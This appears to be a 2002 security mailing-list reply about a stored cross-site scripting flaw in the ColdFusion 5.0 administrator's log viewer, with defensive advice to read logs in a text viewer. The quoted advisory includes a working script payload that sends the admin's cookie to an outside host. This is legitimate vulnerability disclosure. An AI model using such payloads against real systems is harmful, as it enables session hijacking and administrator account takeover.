Re: Cross-site scripting vulnerability in CF 5.0

[<SecurityFocus () cubesearch com>]

Something to note:

The 'view admin log' feature in CF tends to cause stress on the CF
process, and also blocks the log file during opening.

So, It's generally a better (and safer, with this cross-site scripting
problem that's been around for years) to view the logs file via a text
viewer on the sytem.

By default, it's c:\cfusion\log\*.log


On Mon, 16 Dec 2002, KiLL CoLe wrote:

> Cross-site scripting vulnerability in CF 5.0.  This
> issue was brought up to macromedia on July 22nd, 2002.
> Macromedia issued a fix to me, but I have not seen the
> fix available to the public.  the coldfusion
> administrator allows you to view your application log
> via your web browser.  Under certain conditions, it is
> possible to remotely alter coldfusions application
> log.  take the following code:
>
> <CFQUERY NAME="qProducts" DATASOURCE="#datasrc#">
>    SELECT * FROM Products
>    Where ProductId = #int(url.productid)#
> </CFQUERY>
>
> if the INT function encounters a value that is not
> numeric, it throws an exception and writes the value
> that was passed to application.log. Should an
> unsuspecting administrator view the log file via their
> web browser, script could be executed.  Analyze this
> code:
> if url.productid (from the above example) were passed
> in as:
>
> <iframe name="frame1" width="0" height="0"></iframe>
> <script>document.frame1.location="http://www.domain.com/index.cfm?stealcookie=";
> + document.cookie</script>
>
> this would enable an attacker to steal the value of
> the coldfusion administrators cookie.  Decrypting the
> coldfusion admin's password is well documented, and
> exposes a mild-moderate threat to server security.
>
> **NOTE: there are dozens of other functions that throw
> exceptions similar to the INT function.
>
> __________________________________________________
> Do you Yahoo!?
> Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
> http://mailplus.yahoo.com